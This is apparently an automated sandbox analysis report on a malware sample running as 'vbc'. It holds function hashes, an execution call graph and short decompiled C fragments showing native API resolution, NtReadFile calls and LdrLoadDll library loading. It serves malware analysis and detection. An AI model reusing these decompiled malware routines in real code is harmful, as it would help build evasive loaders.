                                        • Opcode Fuzzy Hash: a328e0c416856a6757a813db9c06a045cbfade0ef197e6f148fedb5e8dc8b934
                                        • Instruction Fuzzy Hash: 26515571E016698BEB58CF6B8C4479EFAF3AFC9304F14C1BA841CAA255DB705986CE50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00509BC0 Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e49fd769dc3848cbb7ad047faa80729e59e530d9545829b5593469903c08512b
                                        • Instruction ID: 70266ef9071888095b7b511b0d71d7557f380594f5900ab39174ccf55c4c4adf
                                        • Opcode Fuzzy Hash: e49fd769dc3848cbb7ad047faa80729e59e530d9545829b5593469903c08512b
                                        • Instruction Fuzzy Hash: 82515C70A142498FD785EFBAE894AEE7BF6BF85304F05C529D104AB269DF7059068F80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00509BD0 Relevance: .2, Instructions: 151COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e3dfd817fb83741a70f7609513f3fdfaf40514ab88bacc02921c2a166ae2d96
                                        • Instruction ID: 527d3ec13b54a0918b14e979972ef746479def702a30812b1d6417acfa28bf14
                                        • Opcode Fuzzy Hash: 7e3dfd817fb83741a70f7609513f3fdfaf40514ab88bacc02921c2a166ae2d96
                                        • Instruction Fuzzy Hash: A6516E70A102498FD785EFBAE884ADE7BF2BBC5304F05C539D104AB269DF7059068F80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500970 Relevance: .1, Instructions: 141COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0e20db88db718cf26108af4a6aa1b013da867b74edf8b8901b652e81e0a6fa7
                                        • Instruction ID: 5d921fbcafbf6aa57eda2c2d2f1f6e65e92cf4151605cb214e0f258a2569ff39
                                        • Opcode Fuzzy Hash: f0e20db88db718cf26108af4a6aa1b013da867b74edf8b8901b652e81e0a6fa7
                                        • Instruction Fuzzy Hash: 1B515F749142489FD788EFB9E884ADDBBF3ABD5304F00C539D108AB369DF7459068B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500BB1 Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9beda2c7604f6d504ca50ea656cdd0a5221e0b0b286574b55b5e313668af9b0
                                        • Instruction ID: c7a758d018ec9edb986e1e57b96c764ef8417915c3232e3e80c41d9fe0c4d369
                                        • Opcode Fuzzy Hash: b9beda2c7604f6d504ca50ea656cdd0a5221e0b0b286574b55b5e313668af9b0
                                        • Instruction Fuzzy Hash: 7A411371E056598BEB1CCF6B8D4469EFAF3BFC9300F14C1BA845CAA265DB7005468F51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:4.3%
                                        Dynamic/Decrypted Code Coverage:2.4%
                                        Signature Coverage:5.8%
                                        Total number of Nodes:587
                                        Total number of Limit Nodes:72
                                        execution_graph 32534 41d4b0 32535 41d4bb 32534->32535 32537 419c00 32534->32537 32538 419c26 32537->32538 32549 408b70 32538->32549 32540 419c32 32548 419c79 32540->32548 32557 40d180 32540->32557 32542 419c47 32546 419c5c 32542->32546 32605 418940 32542->32605 32545 419c6b 32547 418940 2 API calls 32545->32547 32569 40a620 32546->32569 32547->32548 32548->32535 32550 408b7d 32549->32550 32608 408ac0 32549->32608 32552 408b84 32550->32552 32620 408a60 32550->32620 32552->32540 32558 40d1ac 32557->32558 33038 40a020 32558->33038 32560 40d1be 33042 40d090 32560->33042 32563 40d1f1 32566 40d202 32563->32566 32568 418720 2 API calls 32563->32568 32564 40d1d9 32565 40d1e4 32564->32565 32567 418720 2 API calls 32564->32567 32565->32542 32566->32542 32567->32565 32568->32566 32570 40a645 32569->32570 32571 40a020 LdrLoadDll 32570->32571 32572 40a69c 32571->32572 33061 409ca0 32572->33061 32574 40a913 32574->32545 32575 40a6c2 32575->32574 33070 4133b0 32575->33070 32577 40a707 32577->32574 33074 4079e0 32577->33074 32579 40a74b 32579->32574 33081 418790 32579->33081 32583 40a7a1 32584 40a7a8 32583->32584 33093 4182a0 32583->33093 32585 41a0b0 2 API calls 32584->32585 32587 40a7b5 32585->32587 32587->32545 32589 40a7f2 32590 41a0b0 2 API calls 32589->32590 32591 40a7f9 32590->32591 32591->32545 32592 40a802 32593 40d210 3 API calls 32592->32593 32594 40a876 32593->32594 32594->32584 32595 40a881 32594->32595 32596 41a0b0 2 API calls 32595->32596 32597 40a8a5 32596->32597 33098 4182f0 32597->33098 32600 4182a0 2 API calls 32601 40a8e0 32600->32601 32601->32574 33103 4180b0 32601->33103 32604 418940 2 API calls 32604->32574 32606 4191f0 LdrLoadDll 32605->32606 32607 41895f ExitProcess 32606->32607 32607->32546 32639 416e60 32608->32639 32612 408ae6 32612->32550 32613 408adc 32613->32612 32646 419540 32613->32646 32615 408b23 32615->32612 32657 4088e0 32615->32657 32617 408b43 32663 408330 LdrLoadDll 32617->32663 32619 408b55 32619->32550 32621 408a7a 32620->32621 32622 419830 LdrLoadDll 32620->32622 33013 419830 32621->33013 32622->32621 32625 419830 LdrLoadDll 32626 408aa1 32625->32626 32627 40cf80 32626->32627 32628 40cf99 32627->32628 33021 409ea0 32628->33021 32630 40cfac 33025 418470 32630->33025 32633 408b95 32633->32540 32635 40cfd2 32636 40cffd 32635->32636 33031 4184f0 32635->33031 32638 418720 2 API calls 32636->32638 32638->32633 32640 416e6f 32639->32640 32664 413e60 32640->32664 32642 408ad3 32643 416d10 32642->32643 32670 418890 32643->32670 32647 419559 32646->32647 32677 413a60 32647->32677 32649 419571 32650 41957a 32649->32650 32716 419380 32649->32716 32650->32615 32652 41958e 32652->32650 32734 418190 32652->32734 32991 406e30 32657->32991 32659 408901 32659->32617 32660 4088fa 32660->32659 33004 4070f0 32660->33004 32663->32619 32665 413e6e 32664->32665 32666 413e7a 32664->32666 32665->32666 32669 4142e0 LdrLoadDll 32665->32669 32666->32642 32668 413fcc 32668->32642 32669->32668 32671 416d25 32670->32671 32673 4191f0 32670->32673 32671->32613 32674 419200 32673->32674 32675 419222 32673->32675 32676 413e60 LdrLoadDll 32674->32676 32675->32671 32676->32675 32678 413d95 32677->32678 32679 413a74 32677->32679 32678->32649 32679->32678 32742 417ee0 32679->32742 32682 413ba0 32745 4185f0 32682->32745 32683 413b83 32802 4186f0 LdrLoadDll 32683->32802 32686 413b8d 32686->32649 32687 413bc7 32688 41a0b0 2 API calls 32687->32688 32689 413bd3 32688->32689 32689->32686 32690 413d59 32689->32690 32692 413d6f 32689->32692 32696 413c62 32689->32696 32691 418720 2 API calls 32690->32691 32693 413d60 32691->32693 32811 4137a0 LdrLoadDll NtReadFile NtClose 32692->32811 32693->32649 32695 413d82 32695->32649 32697 413cc9 32696->32697 32699 413c71 32696->32699 32697->32690 32698 413cdc 32697->32698 32804 418570 32698->32804 32701 413c76 32699->32701 32702 413c8a 32699->32702 32803 413660 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32701->32803 32703 413ca7 32702->32703 32704 413c8f 32702->32704 32703->32693 32760 413420 32703->32760 32748 413700 32704->32748 32709 413c80 32709->32649 32710 413c9d 32710->32649 32712 413d3c 32808 418720 32712->32808 32713 413cbf 32713->32649 32715 413d48 32715->32649 32718 419391 32716->32718 32717 4193a3 32717->32652 32718->32717 32830 41a030 32718->32830 32720 4193c4 32833 413070 32720->32833 32722 419410 32722->32652 32723 4193e7 32723->32722 32724 413070 3 API calls 32723->32724 32726 419409 32724->32726 32726->32722 32865 4143a0 32726->32865 32727 41949a 32728 4194aa 32727->32728 32959 419190 LdrLoadDll 32727->32959 32875 419000 32728->32875 32731 4194d8 32954 418150 32731->32954 32735 4181ac 32734->32735 32736 4191f0 LdrLoadDll 32734->32736 32987 79fae8 LdrInitializeThunk 32735->32987 32736->32735 32737 4181c7 32739 41a0b0 32737->32739 32740 4195e9 32739->32740 32988 418900 32739->32988 32740->32615 32743 413b54 32742->32743 32744 4191f0 LdrLoadDll 32742->32744 32743->32682 32743->32683 32743->32686 32744->32743 32746 41860c NtCreateFile 32745->32746 32747 4191f0 LdrLoadDll 32745->32747 32746->32687 32747->32746 32749 41371c 32748->32749 32750 418570 LdrLoadDll 32749->32750 32751 41373d 32750->32751 32752 413744 32751->32752 32753 413758 32751->32753 32754 418720 2 API calls 32752->32754 32755 418720 2 API calls 32753->32755 32756 41374d 32754->32756 32757 413761 32755->32757 32756->32710 32812 41a2c0 LdrLoadDll RtlAllocateHeap 32757->32812 32759 41376c 32759->32710 32761 41346b 32760->32761 32762 41349e 32760->32762 32764 418570 LdrLoadDll 32761->32764 32763 4135e9 32762->32763 32767 4134ba 32762->32767 32765 418570 LdrLoadDll 32763->32765 32766 413486 32764->32766 32775 413604 32765->32775 32768 418720 2 API calls 32766->32768 32769 418570 LdrLoadDll 32767->32769 32771 41348f 32768->32771 32770 4134d5 32769->32770 32773 4134f1 32770->32773 32774 4134dc 32770->32774 32771->32713 32778 4134f6 32773->32778 32779 41350c 32773->32779 32777 418720 2 API calls 32774->32777 32825 4185b0 LdrLoadDll 32775->32825 32776 41363e 32780 418720 2 API calls 32776->32780 32781 4134e5 32777->32781 32782 418720 2 API calls 32778->32782 32788 413511 32779->32788 32813 41a280 32779->32813 32783 413649 32780->32783 32781->32713 32784 4134ff 32782->32784 32783->32713 32784->32713 32787 413577 32789 41358e 32787->32789 32824 418530 LdrLoadDll 32787->32824 32795 413523 32788->32795 32816 4186a0 32788->32816 32791 413595 32789->32791 32792 4135aa 32789->32792 32793 418720 2 API calls 32791->32793 32794 418720 2 API calls 32792->32794 32793->32795 32796 4135b3 32794->32796 32795->32713 32797 4135df 32796->32797 32819 419e80 32796->32819 32797->32713 32799 4135ca 32800 41a0b0 2 API calls 32799->32800 32801 4135d3 32800->32801 32801->32713 32802->32686 32803->32709 32805 413d24 32804->32805 32806 4191f0 LdrLoadDll 32804->32806 32807 4185b0 LdrLoadDll 32805->32807 32806->32805 32807->32712 32809 41873c NtClose 32808->32809 32810 4191f0 LdrLoadDll 32808->32810 32809->32715 32810->32809 32811->32695 32812->32759 32826 4188c0 32813->32826 32815 41a298 32815->32788 32817 4191f0 LdrLoadDll 32816->32817 32818 4186bc NtReadFile 32817->32818 32818->32787 32820 419ea4 32819->32820 32821 419e8d 32819->32821 32820->32799 32821->32820 32822 41a280 2 API calls 32821->32822 32823 419ebb 32822->32823 32823->32799 32824->32789 32825->32776 32827 4188ce 32826->32827 32828 4191f0 LdrLoadDll 32827->32828 32829 4188dc RtlAllocateHeap 32828->32829 32829->32815 32831 41a05d 32830->32831 32960 4187d0 32830->32960 32831->32720 32834 413081 32833->32834 32835 413089 32833->32835 32834->32723 32864 41335c 32835->32864 32963 41b260 32835->32963 32837 4130dd 32838 41b260 2 API calls 32837->32838 32841 4130e8 32838->32841 32839 413136 32842 41b260 2 API calls 32839->32842 32841->32839 32843 41b390 3 API calls 32841->32843 32974 41b300 LdrLoadDll RtlAllocateHeap RtlFreeHeap 32841->32974 32845 41314a 32842->32845 32843->32841 32844 4131a7 32846 41b260 2 API calls 32844->32846 32845->32844 32968 41b390 32845->32968 32847 4131bd 32846->32847 32849 4131fa 32847->32849 32851 41b390 3 API calls 32847->32851 32850 41b260 2 API calls 32849->32850 32854 413205 32850->32854 32851->32847 32852 41b390 3 API calls 32852->32854 32854->32852 32857 41323f 32854->32857 32855 413334 32976 41b2c0 LdrLoadDll RtlFreeHeap 32855->32976 32975 41b2c0 LdrLoadDll RtlFreeHeap 32857->32975 32858 41333e 32977 41b2c0 LdrLoadDll RtlFreeHeap 32858->32977 32860 413348 32978 41b2c0 LdrLoadDll RtlFreeHeap 32860->32978 32862 413352 32979 41b2c0 LdrLoadDll RtlFreeHeap 32862->32979 32864->32723 32866 4143b1 32865->32866 32867 413a60 8 API calls 32866->32867 32869 4143c7 32867->32869 32868 41441a 32868->32727 32869->32868 32870 414402 32869->32870 32871 414415 32869->32871 32872 41a0b0 2 API calls 32870->32872 32873 41a0b0 2 API calls 32871->32873 32874 414407 32872->32874 32873->32868 32874->32727 32980 418ec0 32875->32980 32877 419014 32878 418ec0 LdrLoadDll 32877->32878 32879 41901d 32878->32879 32880 418ec0 LdrLoadDll 32879->32880 32881 419026 32880->32881 32882 418ec0 LdrLoadDll 32881->32882 32883 41902f 32882->32883 32884 418ec0 LdrLoadDll 32883->32884 32885 419038 32884->32885 32886 418ec0 LdrLoadDll 32885->32886 32887 419041 32886->32887 32888 418ec0 LdrLoadDll 32887->32888 32889 41904d 32888->32889 32890 418ec0 LdrLoadDll 32889->32890 32891 419056 32890->32891 32892 418ec0 LdrLoadDll 32891->32892 32893 41905f 32892->32893 32894 418ec0 LdrLoadDll 32893->32894 32895 419068 32894->32895 32896 418ec0 LdrLoadDll 32895->32896 32897 419071 32896->32897 32898 418ec0 LdrLoadDll 32897->32898 32899 41907a 32898->32899 32900 418ec0 LdrLoadDll 32899->32900 32901 419086 32900->32901 32902 418ec0 LdrLoadDll 32901->32902 32903 41908f 32902->32903 32904 418ec0 LdrLoadDll 32903->32904 32905 419098 32904->32905 32906 418ec0 LdrLoadDll 32905->32906 32907 4190a1 32906->32907 32908 418ec0 LdrLoadDll 32907->32908 32909 4190aa 32908->32909 32910 418ec0 LdrLoadDll 32909->32910 32911 4190b3 32910->32911 32912 418ec0 LdrLoadDll 32911->32912 32913 4190bf 32912->32913 32914 418ec0 LdrLoadDll 32913->32914 32915 4190c8 32914->32915 32916 418ec0 LdrLoadDll 32915->32916 32917 4190d1 32916->32917 32918 418ec0 LdrLoadDll 32917->32918 32919 4190da 32918->32919 32920 418ec0 LdrLoadDll 32919->32920 32921 4190e3 32920->32921 32922 418ec0 LdrLoadDll 32921->32922 32923 4190ec 32922->32923 32924 418ec0 LdrLoadDll 32923->32924 32925 4190f8 32924->32925 32926 418ec0 LdrLoadDll 32925->32926 32927 419101 32926->32927 32928 418ec0 LdrLoadDll 32927->32928 32929 41910a 32928->32929 32930 418ec0 LdrLoadDll 32929->32930 32931 419113 32930->32931 32932 418ec0 LdrLoadDll 32931->32932 32933 41911c 32932->32933 32934 418ec0 LdrLoadDll 32933->32934 32935 419125 32934->32935 32936 418ec0 LdrLoadDll 32935->32936 32937 419131 32936->32937 32938 418ec0 LdrLoadDll 32937->32938 32939 41913a 32938->32939 32940 418ec0 LdrLoadDll 32939->32940 32941 419143 32940->32941 32942 418ec0 LdrLoadDll 32941->32942 32943 41914c 32942->32943 32944 418ec0 LdrLoadDll 32943->32944 32945 419155 32944->32945 32946 418ec0 LdrLoadDll 32945->32946 32947 41915e 32946->32947 32948 418ec0 LdrLoadDll 32947->32948 32949 41916a 32948->32949 32950 418ec0 LdrLoadDll 32949->32950 32951 419173 32950->32951 32952 418ec0 LdrLoadDll 32951->32952 32953 41917c 32952->32953 32953->32731 32955 4191f0 LdrLoadDll 32954->32955 32956 41816c 32955->32956 32986 79fdc0 LdrInitializeThunk 32956->32986 32957 418183 32957->32652 32959->32728 32961 4191f0 LdrLoadDll 32960->32961 32962 4187ec NtAllocateVirtualMemory 32961->32962 32962->32831 32964 41b270 32963->32964 32965 41b276 32963->32965 32964->32837 32966 41a280 2 API calls 32965->32966 32967 41b29c 32966->32967 32967->32837 32969 41b300 32968->32969 32970 41a280 2 API calls 32969->32970 32971 41b35d 32969->32971 32972 41b33a 32970->32972 32971->32845 32973 41a0b0 2 API calls 32972->32973 32973->32971 32974->32841 32975->32855 32976->32858 32977->32860 32978->32862 32979->32864 32981 418edb 32980->32981 32982 413e60 LdrLoadDll 32981->32982 32983 418efb 32982->32983 32984 413e60 LdrLoadDll 32983->32984 32985 418fa7 32983->32985 32984->32985 32985->32877 32985->32985 32986->32957 32987->32737 32989 41891c RtlFreeHeap 32988->32989 32990 4191f0 LdrLoadDll 32988->32990 32989->32740 32990->32989 32992 406e40 32991->32992 32993 406e3b 32991->32993 32994 41a030 2 API calls 32992->32994 32993->32660 33003 406e65 32994->33003 32995 406ec8 32995->32660 32996 418150 2 API calls 32996->33003 32997 406ece 32999 406ef4 32997->32999 33000 418850 2 API calls 32997->33000 32999->32660 33001 406ee5 33000->33001 33001->32660 33002 41a030 2 API calls 33002->33003 33003->32995 33003->32996 33003->32997 33003->33002 33007 418850 33003->33007 33005 40710e 33004->33005 33006 418850 2 API calls 33004->33006 33005->32617 33006->33005 33008 41886c 33007->33008 33009 4191f0 LdrLoadDll 33007->33009 33012 79fb68 LdrInitializeThunk 33008->33012 33009->33008 33010 418883 33010->33003 33012->33010 33014 419853 33013->33014 33017 409b50 33014->33017 33018 409b74 33017->33018 33019 409bb0 LdrLoadDll 33018->33019 33020 408a8b 33018->33020 33019->33020 33020->32625 33023 409ec3 33021->33023 33022 409f40 33022->32630 33023->33022 33036 417f20 LdrLoadDll 33023->33036 33026 4191f0 LdrLoadDll 33025->33026 33027 40cfbb 33026->33027 33027->32633 33028 418a60 33027->33028 33029 4191f0 LdrLoadDll 33028->33029 33030 418a7f LookupPrivilegeValueW 33029->33030 33030->32635 33032 41850c 33031->33032 33033 4191f0 LdrLoadDll 33031->33033 33037 79fed0 LdrInitializeThunk 33032->33037 33033->33032 33034 41852b 33034->32636 33036->33022 33037->33034 33039 40a047 33038->33039 33040 409ea0 LdrLoadDll 33039->33040 33041 40a076 33040->33041 33041->32560 33043 40d0aa 33042->33043 33051 40d160 33042->33051 33044 409ea0 LdrLoadDll 33043->33044 33045 40d0cc 33044->33045 33052 4181d0 33045->33052 33047 40d10e 33055 418210 33047->33055 33050 418720 2 API calls 33050->33051 33051->32563 33051->32564 33053 4191f0 LdrLoadDll 33052->33053 33054 4181ec 33053->33054 33054->33047 33056 41822c 33055->33056 33057 4191f0 LdrLoadDll 33055->33057 33060 7a07ac LdrInitializeThunk 33056->33060 33057->33056 33058 40d154 33058->33050 33060->33058 33062 409cb1 33061->33062 33063 409cad 33061->33063 33064 409cfc 33062->33064 33067 409cca 33062->33067 33063->32575 33109 417f60 LdrLoadDll 33064->33109 33066 409d0d 33066->32575 33108 417f60 LdrLoadDll 33067->33108 33069 409cec 33069->32575 33071 4133c0 33070->33071 33072 40d210 3 API calls 33071->33072 33073 4133d6 33072->33073 33073->32577 33075 4079f9 33074->33075 33110 407720 33074->33110 33077 407a1d 33075->33077 33078 407720 19 API calls 33075->33078 33077->32579 33079 407a0a 33078->33079 33079->33077 33128 40d480 10 API calls 33079->33128 33082 4191f0 LdrLoadDll 33081->33082 33083 4187ac 33082->33083 33249 79fea0 LdrInitializeThunk 33083->33249 33084 40a782 33086 40d210 33084->33086 33087 40d22d 33086->33087 33250 418250 33087->33250 33090 40d275 33090->32583 33091 4182a0 2 API calls 33092 40d29e 33091->33092 33092->32583 33094 4191f0 LdrLoadDll 33093->33094 33095 4182bc 33094->33095 33256 79fc60 LdrInitializeThunk 33095->33256 33096 40a7e5 33096->32589 33096->32592 33099 4191f0 LdrLoadDll 33098->33099 33100 41830c 33099->33100 33257 79fc90 LdrInitializeThunk 33100->33257 33101 40a8b9 33101->32600 33104 4191f0 LdrLoadDll 33103->33104 33105 4180cc 33104->33105 33258 7a0078 LdrInitializeThunk 33105->33258 33106 40a90c 33106->32604 33108->33069 33109->33066 33111 406e30 4 API calls 33110->33111 33114 40773a 33111->33114 33112 4079c9 33112->33075 33113 4079bf 33115 4070f0 2 API calls 33113->33115 33114->33112 33114->33113 33118 418190 2 API calls 33114->33118 33122 40a920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33114->33122 33125 4180b0 2 API calls 33114->33125 33126 418720 LdrLoadDll NtClose 33114->33126 33129 417fa0 33114->33129 33132 407550 33114->33132 33144 40d360 LdrLoadDll NtClose 33114->33144 33145 418020 LdrLoadDll 33114->33145 33146 418050 LdrLoadDll 33114->33146 33147 4180e0 LdrLoadDll 33114->33147 33148 407320 33114->33148 33164 405ea0 LdrLoadDll 33114->33164 33115->33112 33118->33114 33122->33114 33125->33114 33126->33114 33128->33077 33130 417fbc 33129->33130 33131 4191f0 LdrLoadDll 33129->33131 33130->33114 33131->33130 33133 407566 33132->33133 33165 417b10 33133->33165 33135 40757f 33136 4076f1 33135->33136 33186 407130 33135->33186 33136->33114 33138 407665 33138->33136 33139 407320 11 API calls 33138->33139 33140 407693 33139->33140 33140->33136 33141 418190 2 API calls 33140->33141 33142 4076c8 33141->33142 33142->33136 33143 418790 2 API calls 33142->33143 33143->33136 33144->33114 33145->33114 33146->33114 33147->33114 33149 407349 33148->33149 33226 407290 33149->33226 33152 418790 2 API calls 33153 40735c 33152->33153 33153->33152 33154 4073e7 33153->33154 33157 4073e2 33153->33157 33234 40d3e0 33153->33234 33154->33114 33155 418720 2 API calls 33156 40741a 33155->33156 33156->33154 33158 417fa0 LdrLoadDll 33156->33158 33157->33155 33159 40747f 33158->33159 33159->33154 33238 417fe0 33159->33238 33161 4074e3 33161->33154 33162 413a60 8 API calls 33161->33162 33163 407538 33162->33163 33163->33114 33164->33114 33166 41a280 2 API calls 33165->33166 33167 417b27 33166->33167 33193 408170 33167->33193 33169 417b42 33170 417b80 33169->33170 33171 417b69 33169->33171 33174 41a030 2 API calls 33170->33174 33172 41a0b0 2 API calls 33171->33172 33173 417b76 33172->33173 33173->33135 33175 417bba 33174->33175 33176 41a030 2 API calls 33175->33176 33177 417bd3 33176->33177 33183 417e74 33177->33183 33199 41a070 33177->33199 33180 417e60 33181 41a0b0 2 API calls 33180->33181 33182 417e6a 33181->33182 33182->33135 33184 41a0b0 2 API calls 33183->33184 33185 417ec9 33184->33185 33185->33135 33187 40722f 33186->33187 33188 407145 33186->33188 33187->33138 33188->33187 33189 413a60 8 API calls 33188->33189 33190 4071b2 33189->33190 33191 41a0b0 2 API calls 33190->33191 33192 4071d9 33190->33192 33191->33192 33192->33138 33194 408195 33193->33194 33195 409b50 LdrLoadDll 33194->33195 33196 4081c8 33195->33196 33198 4081ed 33196->33198 33202 40b350 33196->33202 33198->33169 33220 418810 33199->33220 33203 40b37c 33202->33203 33204 418470 LdrLoadDll 33203->33204 33205 40b395 33204->33205 33206 40b39c 33205->33206 33213 4184b0 33205->33213 33206->33198 33210 40b3d7 33211 418720 2 API calls 33210->33211 33212 40b3fa 33211->33212 33212->33198 33214 4191f0 LdrLoadDll 33213->33214 33215 4184cc 33214->33215 33219 79fbb8 LdrInitializeThunk 33215->33219 33216 40b3bf 33216->33206 33218 418aa0 LdrLoadDll 33216->33218 33218->33210 33219->33216 33221 4191f0 LdrLoadDll 33220->33221 33222 41882c 33221->33222 33225 7a0048 LdrInitializeThunk 33222->33225 33223 417e59 33223->33180 33223->33183 33225->33223 33227 4072a8 33226->33227 33228 409b50 LdrLoadDll 33227->33228 33229 4072c3 33228->33229 33230 413e60 LdrLoadDll 33229->33230 33231 4072d3 33230->33231 33232 4072dc PostThreadMessageW 33231->33232 33233 4072f0 33231->33233 33232->33233 33233->33153 33235 40d3f3 33234->33235 33242 418120 33235->33242 33239 417ff7 33238->33239 33240 4191f0 LdrLoadDll 33239->33240 33241 417ffc 33240->33241 33241->33161 33243 41812a 33242->33243 33244 4191f0 LdrLoadDll 33243->33244 33245 41813c 33244->33245 33248 79fd8c LdrInitializeThunk 33245->33248 33246 40d41e 33246->33153 33248->33246 33249->33084 33251 41826c 33250->33251 33252 4191f0 LdrLoadDll 33250->33252 33255 79ffb4 LdrInitializeThunk 33251->33255 33252->33251 33253 40d26e 33253->33090 33253->33091 33255->33253 33256->33096 33257->33101 33258->33106 33259 79f900 LdrInitializeThunk

                                        Executed Functions

                                        Function 004186A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 8 4186a0-4186e9 call 4191f0 NtReadFile
                                        C-Code - Quality: 37%
                                        			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}






                                        0x004186a3
                                        0x004186af
                                        0x004186b7
                                        0x004186bc
                                        0x004186e5
                                        0x004186e9

                                        APIs
                                        • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: A:A
                                        • API String ID: 2738559852-2859176346
                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409B50 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 225 409b50-409b6c 226 409b74-409b79 225->226 227 409b6f call 41af80 225->227 228 409b7b-409b7e 226->228 229 409b7f-409b8d call 41b3a0 226->229 227->226 232 409b9d-409bae call 419730 229->232 233 409b8f-409b9a call 41b620 229->233 238 409bb0-409bc4 LdrLoadDll 232->238 239 409bc7-409bca 232->239 233->232 238->239
                                        C-Code - Quality: 86%
                                        			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
				void* _v3;
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t14 = E0041AF80( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t14 != 0) {
					_t16 = E0041B3A0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t16;
					if(_t16 != 0) {
						E0041B620( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t17 = E00419730(_v8);
					asm("les eax, [ecx+ecx*4]");
					asm("hlt");
					__eflags = _t17;
					if(_t17 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t17;
				} else {
					return _t14;
				}
			}














                                        0x00409b6c
                                        0x00409b6f
                                        0x00409b74
                                        0x00409b79
                                        0x00409b83
                                        0x00409b88
                                        0x00409b8b
                                        0x00409b8d
                                        0x00409b95
                                        0x00409b9a
                                        0x00409b9a
                                        0x00409ba1
                                        0x00409ba7
                                        0x00409bab
                                        0x00409bac
                                        0x00409bae
                                        0x00409bc2
                                        0x00000000
                                        0x00409bc4
                                        0x00409bca
                                        0x00409b7e
                                        0x00409b7e
                                        0x00409b7e

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                        • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                        • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
